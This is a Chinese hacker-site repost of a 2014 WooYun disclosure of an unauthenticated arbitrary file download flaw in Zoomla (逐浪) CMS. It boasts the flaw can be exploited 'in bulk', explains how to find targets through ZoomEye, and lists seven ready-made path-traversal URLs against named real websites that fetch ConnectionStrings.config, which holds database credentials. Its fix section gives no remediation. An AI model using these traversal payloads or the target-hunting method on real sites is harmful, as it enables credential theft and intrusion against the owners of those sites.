记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

逐浪CMS任意文件下载(下载还不用登录,可以量产)

2014-11-03 13:20

下载后用记事本打开即可

zoomla1.PNG



zoomla2.PNG

漏洞证明:

可以用zoomeye搜

code 区域
http://www.zoomeye.org/search?q=zoomla



以下是一些例子:

code 区域
http://demo.zoomla.cn/User/UserZone/School/Download.aspx?f=..\..\..\Config\ConnectionStrings.config



code 区域
http://fecsc.com/User/UserZone/School/Download.aspx?f=..\..\..\Config\ConnectionStrings.config



code 区域
www.gzsts.cn/User/UserZone/School/Download.aspx?f=..\..\..\Config\ConnectionStrings.config



code 区域
chinajingshui.com/User/UserZone/School/Download.aspx?f=..\..\..\Config\ConnectionStrings.config



code 区域
http://jxjyedu.cn/User/UserZone/School/Download.aspx?f=..\..\..\Config\ConnectionStrings.config



code 区域
http://gwshcc.org//User/UserZone/School/Download.aspx?f=..\..\..\Config\ConnectionStrings.config



code 区域
http://www.cats.net.cn/User/UserZone/School/Download.aspx?f=..\..\..\Config\ConnectionStrings.config



修复方案:

你懂的


知识来源: www.wooyun.org/bugs/wooyun-2014-070989

阅读:102396 | 评论:0 | 标签:cms

想收藏或者和大家分享这篇好文章→复制链接地址

“逐浪CMS任意文件下载(下载还不用登录,可以量产)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云

本页关键词